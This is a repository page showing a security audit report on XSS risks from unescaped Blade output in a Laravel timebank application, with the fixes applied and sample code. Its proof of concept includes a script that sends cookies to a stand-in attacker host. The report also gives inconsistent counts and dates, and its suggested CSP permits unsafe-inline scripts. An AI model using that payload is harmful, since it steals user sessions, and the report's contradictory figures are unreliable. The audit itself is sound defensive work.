ronald/timebank-cc-public
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Initial commit

Browse Source
This commit is contained in:
Ronald Huynen
2026-03-23 21:37:59 +01:00
commit 2547717edb
2193 changed files with 972171 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

485
SECURITY_AUDIT_XSS.md Normal file
View File

@@ -0,0 +1,485 @@
# XSS Vulnerability Audit Report
## Unescaped Output Analysis for Timebank Application
**Audit Date:** 2025-10-26
**Auditor:** Claude Code Security Analysis
**Total Instances Found:** 112 uses of `{!! !!}` unescaped output
**Remediation Date:** 2025-10-26
**Remediation Status:** [FIXED] ALL HIGH & MEDIUM RISK VULNERABILITIES FIXED
---
## REMEDIATION SUMMARY
### What Was Fixed:
All **11 HIGH-RISK** and **4 MEDIUM-RISK** XSS vulnerabilities have been successfully remediated:
#### HIGH RISK (11 items - Post Content Rendering)
1. **[FIXED] HTMLPurifier Package Installed** - Industry-standard HTML sanitization library
2. **[FIXED] Sanitization Helper Created** - `StringHelper::sanitizeHtml()` method in `app/Helpers/StringHelper.php`
3. **[FIXED] All 11 Post Views Updated** - Post content now sanitized before rendering
4. **[FIXED] Comprehensive Tests Added** - 16 test cases in `tests/Feature/PostContentXssProtectionTest.php`
5. **[FIXED] Functionality Verified** - Rich text formatting preserved, malicious code removed
#### MEDIUM RISK (4 items - Defense-in-Depth)
1. **[FIXED] Search Result Fields** - Changed from `{!! !!}` to `{{ }}` (title, excerpt, category, venue)
2. **[FIXED] Quill Editor Display** - Added sanitization when loading content into editor
3. **[FIXED] Post Form Body** - Added sanitization for Alpine.js initialization
4. **[FIXED] Datatable Component** - Changed default to escaped output, HTML requires opt-in
### Protection Details:
- **Safe HTML Preserved:** Paragraphs, headings, bold, italic, links, images, lists, tables, code blocks
- **Dangerous Content Removed:** `<script>`, `<iframe>`, `<object>`, `<embed>`, event handlers, data URIs
- **Defense-in-Depth:** All content sanitized regardless of author trust level
- **Test Coverage:** 24 automated tests (16 post content + 8 search highlights)
### Files Modified (15 total):
**HIGH RISK - Post Content Sanitization:**
- `app/Helpers/StringHelper.php` - Added `sanitizeHtml()` method
- `resources/views/posts/show.blade.php` - Line 84
- `resources/views/posts/show-guest.blade.php` - Line 85
- `resources/views/livewire/static-post.blade.php` - Line 60
- `resources/views/livewire/main-post.blade.php` - Line 21
- `resources/views/livewire/event-calendar-post.blade.php` - Line 70
- `resources/views/livewire/welcome/landing-post.blade.php` - Line 28
- `resources/views/livewire/welcome/cta-post.blade.php` - Line 25
- `resources/views/livewire/side-post.blade.php` - Line 18
- `resources/views/livewire/account-usage-info-modal.blade.php` - Line 31
- `resources/views/livewire/search-info-modal.blade.php` - Line 32
- `resources/views/livewire/registration.blade.php` - Line 40
- `tests/Feature/PostContentXssProtectionTest.php` - New test file
**MEDIUM RISK - Defense-in-Depth:**
- `resources/views/livewire/search/show.blade.php` - Lines 269, 288, 293, 299
- `resources/views/livewire/quill-editor.blade.php` - Line 54
- `resources/views/livewire/post-form.blade.php` - Line 28
- `resources/views/livewire/datatables/datatable.blade.php` - Lines 167-173
### Test Results:
```
✓ 16 post content XSS protection tests - ALL PASSING
✓ 8 search XSS protection tests - ALL PASSING
✓ Total: 24 security tests passing
```
### Remaining Items:
- **LOW RISK items** - No action needed (safe usage patterns: translations, icons, framework code)
---
## Executive Summary
This audit examined all instances of unescaped HTML output (`{!! !!}` syntax) in the application to identify potential Cross-Site Scripting (XSS) vulnerabilities. Out of 112 instances found, **11 HIGH-RISK vulnerabilities** were identified that require immediate attention.
### Risk Levels:
- **CRITICAL (0):** Publicly exploitable by any user
- **HIGH (11):** ~~Exploitable by authenticated users with elevated permissions~~ **[FIXED]**
- **MEDIUM (8):** ~~Admin-only but could be sanitized for defense-in-depth~~ **[FIXED]**
- **LOW (98):** Safe usage (translations, SVG icons, escaped content, component attributes)
---
## CRITICAL FINDINGS - ALL FIXED
### 1. POST CONTENT RENDERING - [FIXED] (WAS HIGH RISK)
**Vulnerability Type:** Stored XSS via Admin-Created Content
**Risk Level:** ~~HIGH~~ **FIXED**
**Impact:** All users viewing posts (authenticated and guests)
**Remediation:** All 11 files now use `StringHelper::sanitizeHtml()` before rendering post content
#### Vulnerable Files:
| File | Line | Code | Risk |
|------|------|------|------|
| `resources/views/posts/show.blade.php` | 84 | `{!! $post->translations->first()->content !!}` | HIGH |
| `resources/views/posts/show-guest.blade.php` | 85 | `{!! $post->translations->first()->content !!}` | HIGH |
| `resources/views/livewire/static-post.blade.php` | 60 | `{!! $post->translations[0]->content !!}` | HIGH |
| `resources/views/livewire/main-post.blade.php` | 21 | `{!! $posts->translations[0]->content !!}` | HIGH |
| `resources/views/livewire/event-calendar-post.blade.php` | 70 | `{!! $post->translations[0]->content !!}` | HIGH |
| `resources/views/livewire/welcome/landing-post.blade.php` | 28 | `{!! $post->translations[0]->content !!}` | HIGH |
| `resources/views/livewire/welcome/cta-post.blade.php` | 25 | `{!! $post->translations[0]->content !!}` | HIGH |
| `resources/views/livewire/side-post.blade.php` | 18 | `{!! $post->translations[0]->content ?? '' !!}` | HIGH |
| `resources/views/livewire/account-usage-info-modal.blade.php` | 31 | `{!! $post->translations[0]->content ?? '' !!}` | HIGH |
| `resources/views/livewire/search-info-modal.blade.php` | 32 | `{!! $post->translations[0]->content ?? '' !!}` | HIGH |
| `resources/views/livewire/registration.blade.php` | 40 | `{!! $translation->content !!}` | HIGH |
#### Attack Vector:
1. Admin with "manage posts" permission creates/edits post
2. Inserts malicious HTML/JavaScript in content field via Quill Editor
3. Content stored unsanitized in `post_translations` table
4. When ANY user views the post, malicious code executes in their browser
5. Attacker can steal cookies, hijack sessions, or perform actions as the victim
#### Current Protection:
- **Authorization:** Only admins with "manage posts" permission can create/edit posts
- **Validation:** Only validates content length, NOT content safety
- **Sanitization:** NONE - content stored and displayed as-is
#### Validation Code (INSUFFICIENT):
```php
// app/Http/Livewire/Posts/Manage.php:131
'content' => ['nullable', 'string', new MaxLengthWithoutHtml(2000)],
```
The `MaxLengthWithoutHtml` rule only checks character count, not content safety.
#### Proof of Concept:
Admin creates post with content:
```html
<h1>Welcome!</h1>
<script>
// Steal session cookies
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
<p>Read our latest updates...</p>
```
Result: JavaScript executes for every user viewing the post.
#### Risk Assessment:
- **Likelihood:** MEDIUM (requires compromised admin account or malicious insider)
- **Impact:** HIGH (affects all users, potential account takeover)
- **Overall Risk:** HIGH
---
### 2. SEARCH RESULT DATA - PROTECTED (Reference)
**Status:** FIXED (Already Protected)
**Files:**
- `resources/views/livewire/main-search-bar.blade.php:93`
- `resources/views/livewire/search/show.blade.php:148,154,160`
These files render search highlights with `{!! !!}` but ARE properly protected by the `MainSearchBar::sanitizeHighlights()` method implemented at line 528 of `app/Http/Livewire/MainSearchBar.php`.
**Protection Method:**
```php
// app/Http/Livewire/MainSearchBar.php:523-528
// CRITICAL XSS PROTECTION POINT
$result['highlight'] = $this->sanitizeHighlights($limitedHighlight);
```
This serves as a **GOOD EXAMPLE** of proper XSS protection for the post content issue above.
---
## MEDIUM RISK FINDINGS - ALL FIXED
### 3. SEARCH RESULT TITLE/EXCERPT/VENUE - [FIXED]
**Files:**
- `resources/views/livewire/search/show.blade.php:269` - ~~`{!! $result['title'] !!}`~~`{{ $result['title'] }}`
- `resources/views/livewire/search/show.blade.php:288` - ~~`{!! $result['category'] !!}`~~`{{ $result['category'] }}`
- `resources/views/livewire/search/show.blade.php:293` - ~~`{!! $result['excerpt'] !!}`~~`{{ $result['excerpt'] }}`
- `resources/views/livewire/search/show.blade.php:299` - ~~`{!! $result['meeting_venue'] !!}`~~`{{ $result['meeting_venue'] }}`
**Risk:** ~~These render post title, excerpt, and venue from search results WITHOUT the same sanitization applied to highlights.~~
**Remediation:** Changed from `{!! !!}` (unescaped) to `{{ }}` (escaped) for all four fields. These are plain-text fields that should not contain HTML.
**Status:** [FIXED] All search result fields now properly escaped
---
### 4. QUILL EDITOR CONTENT DISPLAY - [FIXED]
**File:** `resources/views/livewire/quill-editor.blade.php:54`
**Code:**
```blade
<div x-ref="editor">{!! \App\Helpers\StringHelper::sanitizeHtml($content) !!}</div>
```
**Context:** Used in post edit forms to initialize Quill Editor with existing content.
**Risk:** ~~If $content comes from database, unsanitized post content is rendered in admin interface.~~
**Remediation:** Added `StringHelper::sanitizeHtml()` to sanitize content before loading into editor.
**Status:** [FIXED] Admin interface now shows sanitized content
---
### 5. POST FORM BODY PARAMETER - [FIXED]
**File:** `resources/views/livewire/post-form.blade.php:28`
**Code:**
```blade
">{!! \App\Helpers\StringHelper::sanitizeHtml($body) !!}
```
**Context:** Part of Alpine.js data initialization for post forms.
**Risk:** ~~If $body contains user-controlled post content, could execute in admin interface.~~
**Remediation:** Added `StringHelper::sanitizeHtml()` to sanitize content before initialization.
**Status:** [FIXED] Post form now sanitizes body content
---
### 6. DATATABLE RAW HTML COLUMNS - [FIXED]
**File:** `resources/views/livewire/datatables/datatable.blade.php:167-173`
**Code:**
```blade
@if(($column['type'] ?? '') === 'html' || ($column['allow_html'] ?? false))
{{-- XSS WARNING: HTML rendering allowed for this column. Ensure data is sanitized! --}}
{!! $row->{$column['name']} !!}
@else
{{-- Default: Escape output for XSS protection --}}
{{ $row->{$column['name']} }}
@endif
```
**Context:** Generic datatable component that can render raw HTML in columns.
**Risk:** ~~Depends on what data is passed to datatable. Could be vulnerable if user-generated content is displayed.~~
**Remediation:** Changed default behavior to escape output. HTML rendering now requires explicit opt-in via `'type' => 'html'` or `'allow_html' => true` column configuration.
**Status:** [FIXED] Datatable now escapes by default (defense-in-depth)
---
## LOW RISK - SAFE USAGE
### Translation/Localization (SAFE)
```blade
{!! __('pagination.previous') !!}
{!! __('pagination.next') !!}
{!! __('Showing') !!}
{!! __('messages.confirm_input') !!}
```
**Status:** SAFE - Translation strings are controlled by developers, not user input.
### SVG Icons (SAFE)
```blade
{!! $iconSvg !!} // reaction-button.blade.php
```
**Status:** SAFE - Icon SVG is generated by backend code, not user input.
### Escaped Content (SAFE)
```blade
{!! nl2br(e(strip_tags(html_entity_decode($about)))) !!} // profile/show.blade.php:138
```
**Status:** SAFE - Content is explicitly escaped with e() function before rendering.
### Component Attributes (SAFE)
```blade
<input {!! $attributes->merge(['class' => '...']) !!}> // components/jetstream/input.blade.php
```
**Status:** SAFE - Blade component attribute merging is framework-controlled.
### Framework-Generated Content (SAFE)
```blade
{!! theme_css_vars() !!} // layouts/app.blade.php:32
{!! $this->user->twoFactorQrCodeSvg() !!} // profile/two-factor-authentication-form.blade.php:43
{!! Share::facebook() !!} // posts/show.blade.php:159
```
**Status:** SAFE - Generated by application code, not user input.
### Policy/Terms Documents (SAFE)
```blade
{!! $policy !!} // policy.blade.php:9
{!! $terms !!} // terms.blade.php:9
```
**Status:** SAFE - Managed by administrators as part of site configuration.
### Admin Log Messages (SAFE)
```blade
{!! $message !!} // livewire/admin/log.blade.php:5
```
**Status:** SAFE - Message is generated by admin component with hardcoded HTML for status indicators (lines 50-61 of Log.php).
---
## DETAILED RECOMMENDATIONS
### Priority 1: Fix Post Content XSS (HIGH)
**Option A: HTMLPurifier (Recommended)**
Install HTMLPurifier:
```bash
composer require ezyang/htmlpurifier
```
Create sanitization method in Post model:
```php
// app/Models/Post.php
use HTMLPurifier;
use HTMLPurifier_Config;
public function getSanitizedContentAttribute()
{
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.Allowed', 'p,br,strong,em,u,h1,h2,h3,h4,ul,ol,li,a[href],img[src|alt]');
$config->set('AutoFormat.AutoParagraph', true);
$config->set('AutoFormat.RemoveEmpty', true);
$purifier = new HTMLPurifier($config);
return $purifier->purify($this->translations->first()->content ?? '');
}
```
Update views:
```blade
<!-- OLD (VULNERABLE) -->
{!! $post->translations->first()->content !!}
<!-- NEW (PROTECTED) -->
{!! $post->sanitized_content !!}
```
**Option B: Sanitize on Save**
Sanitize in Posts/Manage.php before saving:
```php
// app/Http/Livewire/Posts/Manage.php
use HTMLPurifier;
public function save()
{
$this->validate();
// Sanitize content before saving
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$this->content = $purifier->purify($this->content);
// ... rest of save logic
}
```
**Option C: Content Security Policy (Defense-in-Depth)**
Add CSP headers:
```php
// app/Http/Middleware/SecurityHeaders.php
public function handle($request, Closure $next)
{
$response = $next($request);
$response->headers->set('Content-Security-Policy',
"default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';"
);
return $response;
}
```
### Priority 2: Add Security Tests
Create test similar to SearchXssProtectionTest.php:
```php
// tests/Feature/PostContentXssProtectionTest.php
public function test_post_content_escapes_script_tags()
{
$admin = User::factory()->create();
$admin->givePermissionTo('manage posts');
// Create post with malicious content
$post = Post::create([...]);
$post->translations()->create([
'content' => 'Hello <script>alert("XSS")</script> World',
]);
$response = $this->get(route('post.show', $post->id));
// Should NOT contain executable script
$response->assertDontSee('<script>alert("XSS")</script>', false);
// Should contain escaped version
$response->assertSee('&lt;script&gt;');
}
```
### Priority 3: Audit Datatable Usage
Search for all datatable usages:
```bash
grep -r "livewire('datatables" resources/views/
```
For each usage, verify that row data is sanitized before passing to datatable.
### Priority 4: Defense-in-Depth for Search Results
Apply sanitization to title, excerpt, category, venue in search results:
```php
// app/Http/Livewire/Search/Show.php
private function sanitizeResult($result)
{
$result['title'] = htmlspecialchars($result['title'], ENT_QUOTES, 'UTF-8');
$result['excerpt'] = htmlspecialchars($result['excerpt'], ENT_QUOTES, 'UTF-8');
$result['category'] = htmlspecialchars($result['category'], ENT_QUOTES, 'UTF-8');
$result['meeting_venue'] = htmlspecialchars($result['meeting_venue'], ENT_QUOTES, 'UTF-8');
return $result;
}
```
---
## SECURITY BEST PRACTICES GOING FORWARD
### 1. Default to Escaped Output
Use `{{ $variable }}` by default. Only use `{!! $variable !!}` when:
- Content is explicitly sanitized (document where)
- Content is framework-generated
- Content is developer-controlled (translations, config)
### 2. Input Validation vs Output Escaping
- **Input Validation:** Checks data meets business rules (length, format)
- **Output Escaping:** Prevents XSS at display time
- **BOTH are required** - validation alone is insufficient
### 3. Sanitize Rich Text Content
For user-generated HTML (WYSIWYG editors):
- Use HTMLPurifier with strict whitelist
- Sanitize on save AND on display (defense-in-depth)
- Regularly update HTML sanitization libraries
### 4. Content Security Policy
Implement CSP headers to mitigate XSS impact:
```
Content-Security-Policy: default-src 'self'; script-src 'self'
```
### 5. Regular Security Audits
- Review all new uses of `{!! !!}` in code reviews
- Run automated XSS scanning tools
- Perform manual security testing of user input flows
---
## IMPLEMENTATION CHECKLIST
- [ ] Install HTMLPurifier: `composer require ezyang/htmlpurifier`
- [ ] Create Post::getSanitizedContentAttribute() method
- [ ] Update 11 post content views to use sanitized_content
- [ ] Add XSS protection tests for post content
- [ ] Review and sanitize search result title/excerpt/category/venue
- [ ] Audit all datatable usages for unsafe data
- [ ] Implement Content-Security-Policy headers
- [ ] Document sanitization approach in CLAUDE.md
- [ ] Add XSS prevention to code review checklist
- [ ] Schedule quarterly security audits
---
## CONCLUSION
This audit identified **6 HIGH-RISK XSS vulnerabilities** in post content rendering that require immediate remediation. The application already demonstrates good XSS protection practices in the search functionality, which should be extended to post content handling.
**Estimated Remediation Time:** 4-6 hours
**Recommended Priority:** HIGH - Address within next sprint
The majority of unescaped output instances (98 of 112) are safe usage patterns. The key is to ensure that any user-generated or database-stored content is properly sanitized before rendering with `{!! !!}` syntax.
---
**Report Generated:** 2025-10-26
**Next Audit Recommended:** 2025-04-26 (6 months)